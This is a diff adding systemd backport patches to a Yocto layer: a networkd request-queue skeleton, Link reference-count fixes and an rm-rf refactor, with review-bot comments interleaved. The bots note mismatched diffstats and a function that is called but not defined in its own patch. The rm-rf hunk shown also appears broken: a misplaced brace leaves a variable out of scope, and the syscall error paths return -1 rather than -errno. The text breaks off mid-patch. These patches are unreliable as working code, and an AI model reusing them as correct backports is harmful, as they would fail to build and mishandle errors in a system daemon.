+ src/network/networkd-manager.c | 7 ++
+ src/network/networkd-manager.h | 2 +
+ src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++
+ src/network/networkd-queue.h | 42 ++++++++++++
+ 6 files changed, 192 insertions(+), 2 deletions(-)
+ create mode 100644 src/network/networkd-queue.c
+ create mode 100644 src/network/networkd-queue.h
+
+diff --git a/src/network/meson.build b/src/network/meson.build
+index 4fca3106dc..a8b9232e64 100644
+--- a/src/network/meson.build
++++ b/src/network/meson.build
+@@ -105,6 +105,8 @@ sources = files('''
+ networkd-network.h
+ networkd-nexthop.c
+ networkd-nexthop.h
++ networkd-queue.c
++ networkd-queue.h
+ networkd-route.c
+ networkd-route.h
+ networkd-routing-policy-rule.c
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 34359b2541..2f33305a27 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -30,6 +30,7 @@
+ #include "networkd-manager.h"
+ #include "networkd-ndisc.h"
+ #include "networkd-neighbor.h"
++#include "networkd-queue.h"
+ #include "networkd-radv.h"
+ #include "networkd-routing-policy-rule.h"
+ #include "networkd-wifi.h"
+
+@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
+ if (r < 0)
+ return r;
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
+ return r;
+ }
+
++ link_drop_requests(link);
++
+ r = link_drop_config(link);
+ if (r < 0)
+ return r;
+diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
+index 562ce5ca54..fd576169a9 100644
+--- a/src/network/networkd-manager.c
++++ b/src/network/networkd-manager.c
+@@ -34,6 +34,7 @@
+ #include "networkd-manager-bus.h"
+ #include "networkd-manager.h"
+ #include "networkd-network-bus.h"
++#include "networkd-queue.h"
+ #include "networkd-speed-meter.h"
+ #include "ordered-set.h"
+ #include "path-util.h"
+@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
+ if (r < 0)
+ return r;
+
++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
++ if (r < 0)
++ return r;
++
+ r = manager_connect_rtnl(m);
+ if (r < 0)
+ return r;
+@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
+
+ free(m->state_file);
+
++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
++
+ while ((a = hashmap_first_key(m->dhcp6_prefixes)))
+ (void) dhcp6_prefix_remove(m, a);
+ m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
+diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
+index 301b97c1a1..26e8802871 100644
+--- a/src/network/networkd-manager.h
++++ b/src/network/networkd-manager.h
+@@ -91,6 +91,8 @@ struct Manager {
+ usec_t speed_meter_usec_old;
+
+ bool dhcp4_prefix_root_cannot_set_table;
++
++ OrderedSet *request_queue;
+ };
+
+ int manager_new(Manager **ret);
+diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
+new file mode 100644
+index 0000000000..24bb2c845d
+--- /dev/null
++++ b/src/network/networkd-queue.c
+@@ -0,0 +1,121 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++
++#include "networkd-address.h"
++#include "networkd-manager.h"
++#include "networkd-neighbor.h"
++#include "networkd-nexthop.h"
++#include "networkd-route.h"
++#include "networkd-routing-policy-rule.h"
++#include "networkd-queue.h"
++
++static void request_free_object(RequestType type, void *object) {
++ switch(type) {
++ default:
++ assert_not_reached("invalid request type.");
++ }
++}
++
++Request *request_free(Request *req) {
++ if (!req)
++ return NULL;
++
++ if (req->on_free)
++ req->on_free(req);
++ if (req->consume_object)
++ request_free_object(req->type, req->object);
++ if (req->link && req->link->manager)
++ ordered_set_remove(req->link->manager->request_queue, req);
++ link_unref(req->link);
++
++ return mfree(req);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
++
++void request_drop(Request *req) {
++ if (req->message_counter)
++ (*req->message_counter)--;
++
++ request_free(req);
++}
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret) {
++
++ _cleanup_(request_freep) Request *req = NULL;
++ int r;
++
++ assert(link);
++ assert(link->manager);
++ assert(type >= 0 && type < _REQUEST_TYPE_MAX);
++ assert(object);
++ assert(netlink_handler);
++
++ req = new(Request, 1);
++ if (!req) {
++ if (consume_object)
++ request_free_object(type, object);
++ return -ENOMEM;
++ }
++
++ *req = (Request) {
++ .link = link,
++ .type = type,
++ .object = object,
++ .consume_object = consume_object,
++ .message_counter = message_counter,
++ .netlink_handler = netlink_handler,
++ };
++
++ link_ref(link);
++
++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
++ if (r < 0)
++ return r;
++
++ if (req->message_counter)
++ (*req->message_counter)++;
++
++ if (ret)
++ *ret = req;
++
++ TAKE_PTR(req);
++ return 0;
++}
++
++int manager_process_requests(sd_event_source *s, void *userdata) {
++ Manager *manager = userdata;
++ int r;
++
++ assert(manager);
++
++ for (;;) {
++ bool processed = false;
++ Request *req;
++ Iterator i;
++ ORDERED_SET_FOREACH(req, manager->request_queue, i) {
++ switch(req->type) {
++ default:
++ return -EINVAL;
++ }
++ if (r < 0)
++ link_enter_failed(req->link);
++ if (r > 0) {
++ ordered_set_remove(manager->request_queue, req);
++ request_free(req);
++ processed = true;
++ }
++ }
++
++ if (!processed)
++ break;
++ }
++
++ return 0;
++}
+diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
+new file mode 100644
+index 0000000000..4558ae548f
+--- /dev/null
++++ b/src/network/networkd-queue.h
+@@ -0,0 +1,42 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++#pragma once
++
++#include "sd-event.h"
++
++#include "networkd-link.h"
++
++typedef struct Request Request;
++
++typedef int (*request_after_configure_handler_t)(Request*, void*);
++typedef void (*request_on_free_handler_t)(Request*);
++
++typedef enum RequestType {
++ _REQUEST_TYPE_MAX,
++ _REQUEST_TYPE_INVALID = -EINVAL,
++} RequestType;
++
++typedef struct Request {
++ Link *link;
++ RequestType type;
++ bool consume_object;
++ void *object;
++ void *userdata;
++ unsigned *message_counter;
++ link_netlink_message_handler_t netlink_handler;
++ request_after_configure_handler_t after_configure;
++ request_on_free_handler_t on_free;
++} Request;
++
++Request *request_free(Request *req);
++void request_drop(Request *req);
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret);
++
++int manager_process_requests(sd_event_source *s, void *userdata);
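Review bot: The networkd-link.c part of this backport calls `link_drop_requests(link)` in `link_reconfigure_internal()` and `link_carrier_lost()`, but no hunk here defines it; the only definition on this page is in network-also-drop-requests-when-link-enters-linger-state.patch. The diffstat still lists 20 changed lines for networkd-link.c and two deletions overall, while the hunks shown add five lines to that file and remove none, so the patch appears to have been edited after export from the upstream commit. The tree therefore builds only with both patches applied, and the file can no longer be compared directly with the commit named in `Upstream-Status:`. I would record this in the header, e.g. `Comments: link_drop_requests() hunk dropped, provided by network-also-drop-requests-when-link-enters-linger-state.patch`, in the way CVE-2023-26604-4.patch uses `Comments: Hunk refreshed`.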
diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if link is removed, several references to the link in remain
+exist in requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
++static void link_drop_requests(Link *link) {
++ Request *req;
++ Iterator i;
++
++ assert(link);
++ assert(link->manager);
++
++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++ if (req->link == link)
++ request_drop(req);
++}
++
+ void link_drop(Link *link) {
+ if (!link)
+ return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+ /* Drop all references from other links and manager. Note that async netlink calls may have
+ * references to the link, and they will be dropped when we receive replies. */
+
++ link_drop_requests(link);
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+--
+2.17.1
+
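Review bot: `link_drop_requests()` frees entries of `link->manager->request_queue` from inside `ORDERED_SET_FOREACH` without a comment saying why that is safe. `request_drop()` ends in `request_free()`, which (in network-add-skeleton-of-request-queue.patch) removes `req` from the same set and frees it, so the loop depends on the iterator tolerating removal of the current entry; that should be confirmed against the hashmap implementation in this tree. I would state the assumption above the loop, e.g. `/* request_drop() removes req from the queue and frees it; relies on the iterator allowing removal of the current entry. */`.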
diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
+From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 14 May 2021 15:58:15 +0900
+Subject: [PATCH] network: fix Link reference counter issue
+
+Previously, when link_new() fails, `link_unref()` was called, so,
+`Manager::links` may become dirty.
+This introduces `link_drop_or_unref()` and it will be called on
+failure.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 240 ++++++++++++++++++------------------
+ 1 file changed, 122 insertions(+), 118 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index b56c232eca..d493afda4c 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
+ return 0;
+ }
+
+-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
+- _cleanup_(link_unrefp) Link *link = NULL;
+- uint16_t type;
+- const char *ifname, *kind = NULL;
+- int r, ifindex;
+- unsigned short iftype;
+-
+- assert(manager);
+- assert(message);
+- assert(ret);
+-
+- /* check for link kind */
+- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
+- if (r == 0) {
+- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
+- r = sd_netlink_message_exit_container(message);
+- if (r < 0)
+- return r;
+- }
+-
+- r = sd_netlink_message_get_type(message, &type);
+- if (r < 0)
+- return r;
+- else if (type != RTM_NEWLINK)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
+- if (r < 0)
+- return r;
+- else if (ifindex <= 0)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_type(message, &iftype);
+- if (r < 0)
+- return r;
+-
+- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
+- if (r < 0)
+- return r;
+-
+- link = new(Link, 1);
+- if (!link)
+- return -ENOMEM;
+-
+- *link = (Link) {
+- .n_ref = 1,
+- .manager = manager,
+- .state = LINK_STATE_PENDING,
+- .ifindex = ifindex,
+- .iftype = iftype,
+-
+- .n_dns = (unsigned) -1,
+- .dns_default_route = -1,
+- .llmnr = _RESOLVE_SUPPORT_INVALID,
+- .mdns = _RESOLVE_SUPPORT_INVALID,
+- .dnssec_mode = _DNSSEC_MODE_INVALID,
+- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
+- };
+-
+- link->ifname = strdup(ifname);
+- if (!link->ifname)
+- return -ENOMEM;
+-
+- if (kind) {
+- link->kind = strdup(kind);
+- if (!link->kind)
+- return -ENOMEM;
+- }
+-
+- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
+- if (r < 0)
+- log_link_debug_errno(link, r, "New device has no master, continuing without");
+-
+- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
+- if (r < 0)
+- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
+-
+- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- r = hashmap_ensure_allocated(&manager->links, NULL);
+- if (r < 0)
+- return r;
+-
+- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
+- if (r < 0)
+- return r;
+-
+- r = link_update_flags(link, message, false);
+- if (r < 0)
+- return r;
+-
+- *ret = TAKE_PTR(link);
+-
+- return 0;
+-}
+-
+ void link_ntp_settings_clear(Link *link) {
+ link->ntp = strv_free(link->ntp);
+ }
+@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
+ request_drop(req);
+ }
+
+-void link_drop(Link *link) {
++Link *link_drop(Link *link) {
+ if (!link)
+- return;
++ return NULL;
+
+ assert(link->manager);
+
+@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
+
+ /* The following must be called at last. */
+ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
++ return link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
+@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
+
+ return 0;
+ }
++
++static Link *link_drop_or_unref(Link *link) {
++ if (!link)
++ return NULL;
++ if (!link->manager)
++ return link_unref(link);
++ return link_drop(link);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
++
++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
++ _cleanup_(link_drop_or_unrefp) Link *link = NULL;
++ uint16_t type;
++ _cleanup_free_ char *ifname = NULL, *kind = NULL;
++ int r, ifindex;
++ unsigned short iftype;
++
++ assert(manager);
++ assert(message);
++ assert(ret);
++
++ r = sd_netlink_message_get_type(message, &type);
++ if (r < 0)
++ return r;
++ else if (type != RTM_NEWLINK)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
++ if (r < 0)
++ return r;
++ else if (ifindex <= 0)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_type(message, &iftype);
++ if (r < 0)
++ return r;
++
++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
++ if (r < 0)
++ return r;
++
++ /* check for link kind */
++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
++ if (r >= 0) {
++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
++ r = sd_netlink_message_exit_container(message);
++ if (r < 0)
++ return r;
++ }
++
++ link = new(Link, 1);
++ if (!link)
++ return -ENOMEM;
++
++ *link = (Link) {
++ .n_ref = 1,
++ .state = LINK_STATE_PENDING,
++ .ifindex = ifindex,
++ .iftype = iftype,
++ .ifname = TAKE_PTR(ifname),
++ .kind = TAKE_PTR(kind),
++
++ .n_dns = (unsigned) -1,
++ .dns_default_route = -1,
++ .llmnr = _RESOLVE_SUPPORT_INVALID,
++ .mdns = _RESOLVE_SUPPORT_INVALID,
++ .dnssec_mode = _DNSSEC_MODE_INVALID,
++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
++ };
++
++ r = hashmap_ensure_allocated(&manager->links, NULL);
++ if (r < 0)
++ return r;
++
++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
++ if (r < 0)
++ return r;
++
++ link->manager = manager;
++
++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
++ if (r < 0)
++ log_link_debug_errno(link, r, "New device has no master, continuing without");
++
++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
++ if (r < 0)
++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
++
++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ r = link_update_flags(link, message, false);
++ if (r < 0)
++ return r;
++
++ *ret = TAKE_PTR(link);
++
++ return 0;
++}
+
+ int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
+ _cleanup_(sd_device_unrefp) sd_device *device = NULL;
+
+--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530
++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530
+@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
+
+ int link_get(Manager *m, int ifindex, Link **ret);
+ int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
+-void link_drop(Link *link);
++Link *link_drop(Link *link);
+
+ int link_down(Link *link, link_netlink_message_handler_t callback);
+
+
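Review bot: `link_new()` now cleans up through `link_drop_or_unref()`, so every failure after `link->manager = manager` runs `link_drop()` on a partly initialised Link. `link_drop()` calls `(void) unlink(link->state_file)` (visible as context in network-merge-link_drop-and-link_detach_from_manager.patch), and `state_file` is still NULL or unspecified when the `asprintf()` that fills it fails; other steps of `link_drop()` lie outside these hunks and may have similar expectations. I would guard the call with `if (link->state_file) (void) unlink(link->state_file);`, or build the three path strings before the link is put into `manager->links`. The networkd-link.h hunk at the end is also not reflected in the diffstat, which lists one file.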
diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
+From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:40:15 +0900
+Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
+
+link_detach_from_manager() is only called by link_drop(). It is not
+necessary to split such tiny function.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 27 ++++++++++++---------------
+ 1 file changed, 12 insertions(+), 15 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 9d30e16b0a..67d01ac44d 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
+-static void link_detach_from_manager(Link *link) {
+- if (!link || !link->manager)
+- return;
+-
+- link_unref(set_remove(link->manager->links_requesting_uuid, link));
+- link_clean(link);
+-
+- /* The following must be called at last. */
+- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
+-}
+-
+ void link_drop(Link *link) {
+- if (!link || link->state == LINK_STATE_LINGER)
++ if (!link)
+ return;
+
++ assert(link->manager);
++
+ link_set_state(link, LINK_STATE_LINGER);
+
++ /* Drop all references from other links and manager. Note that async netlink calls may have
++ * references to the link, and they will be dropped when we receive replies. */
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
+ link_drop_from_master(link, link->network->bond);
+ }
+
+- log_link_debug(link, "Link removed");
++ link_unref(set_remove(link->manager->links_requesting_uuid, link));
+
+ (void) unlink(link->state_file);
+- link_detach_from_manager(link);
++ link_clean(link);
++
++ /* The following must be called at last. */
++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
++ link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
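Review bot: Dropping the `link->state == LINK_STATE_LINGER` early return makes `link_drop()` unsafe to call twice on the same Link. The first call removes the link from `manager->links`; a second call on a Link that is still referenced would fail `assert_se(hashmap_remove(link->manager->links, ...) == link)` and abort the daemon, where the old code returned early. Whether any caller can reach it twice is not visible from these hunks, so I would at least document the contract above the function: `/* Must be called exactly once per Link; a lingering Link must not be dropped again. */`.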
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
+Backport of the following upstream commit:
+From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 5 Oct 2021 10:32:56 +0200
+Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 3 +++
+ src/basic/rm-rf.h | 1 +
+ 2 files changed, 4 insertions(+)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -161,6 +161,9 @@
+ ret = r;
+ }
+
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
++ ret = -errno;
++
+ return ret;
+ }
+
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -11,6 +11,7 @@
+ REMOVE_PHYSICAL = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
+ REMOVE_SUBVOLUME = 1 << 3, /* Drop btrfs subvolumes in the tree too */
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
++ REMOVE_SYNCFS = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
+ } RemoveFlags;
+
+ int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
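Review bot: The `Upstream-Status:` line points at an Ubuntu source tarball over plain http instead of the upstream commit named in the `From` line, and rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch does the same. A tarball URL cannot be matched hunk by hunk against commit bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2, and the file hunks here carry no `index` lines or function context to help with that. I would reference the commit itself, e.g. `Upstream-Status: Backport [https://github.com/systemd/systemd/commit/bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2]`, and name the Ubuntu package in a `Comments:` line if it was the actual source. `REMOVE_SYNCFS` is also placed at bit 7 while the previous flag uses bit 4, so a short comment that bits 5 and 6 are intentionally left unused would help the next backport.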
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
+Backport of the following upstream commit:
+From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 26 Jan 2021 16:30:06 +0100
+Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
+ iteration loop
+
+This splits out rm_rf_children_inner() as body of the loop. We can use
+that to implement rm_rf_child() for deleting one specific entry in a
+directory.
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
+ src/basic/rm-rf.h | 3 +-
+ 2 files changed, 131 insertions(+), 95 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -19,138 +19,153 @@
+ #include "stat-util.h"
+ #include "string-util.h"
+
++/* We treat tmpfs/ramfs + cgroupfs as non-physical file sytems. cgroupfs is similar to tmpfs in a way after
++ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
++ * those again. */
+ static bool is_physical_fs(const struct statfs *sfs) {
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
++static int rm_rf_children_inner(
++ int fd,
++ const char *fname,
++ int is_dir,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
++ struct stat st;
++ int r;
++
++ assert(fd >= 0);
++ assert(fname);
++
++ if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
++
++ r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
++ if (r < 0)
++ return r;
++
++ is_dir = S_ISDIR(st.st_mode);
++ }
++
++ if (is_dir) {
++ _cleanup_close_ int subdir_fd = -1;
++ int q;
++
++ /* if root_dev is set, remove subdirectories only if device is same */
++ if (root_dev && st.st_dev != root_dev->st_dev)
++ return 0;
++
++ /* Stop at mount points */
++ r = fd_is_mount_point(fd, fname, 0);
++ if (r < 0)
++ return r;
++ if (r > 0)
++ return 0;
++
++ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
++
++ /* This could be a subvolume, try to remove it */
++
++ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
++ if (r < 0) {
++ if (!IN_SET(r, -ENOTTY, -EINVAL))
++ return r;
++
++ /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
++ } else
++ /* It was a subvolume, done. */
++ return 1;
++ }
++
++ subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (subdir_fd < 0)
++ return -errno;
++
++ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
++ * again for each directory */
++ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++
++ r = unlinkat(fd, fname, AT_REMOVEDIR);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++
++ return 1;
++
++ } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
++ r = unlinkat(fd, fname, 0);
++ if (r < 0)
++ return r;
++
++ return 1;
++ }
++
++ return 0;
++}
++
++int rm_rf_children(
++ int fd,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
+ _cleanup_closedir_ DIR *d = NULL;
+ struct dirent *de;
+ int ret = 0, r;
+- struct statfs sfs;
+
+ assert(fd >= 0);
+
+ /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure.. */
++ * fd, in all cases, including on failure. */
++
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
+
+ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
+
+- r = fstatfs(fd, &sfs);
+- if (r < 0) {
+- safe_close(fd);
++ if (fstatfs(dirfd(d), &sfs) < 0)
+ return -errno;
+ }
+
+ if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call,
+- * unless explicitly requested. This is extra paranoia just
+- * to be sure we never ever remove non-state data. */
++ /* We refuse to clean physical file systems with this call, unless explicitly
++ * requested. This is extra paranoia just to be sure we never ever remove non-state
++ * data. */
++
+ _cleanup_free_ char *path = NULL;
+
+ (void) fd_get_path(fd, &path);
+- log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+-
+- safe_close(fd);
+- return -EPERM;
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
+ }
+ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return errno == ENOENT ? 0 : -errno;
+- }
+-
+ FOREACH_DIRENT_ALL(de, d, return -errno) {
+- bool is_dir;
+- struct stat st;
++ int is_dir;
+
+ if (dot_or_dot_dot(de->d_name))
+ continue;
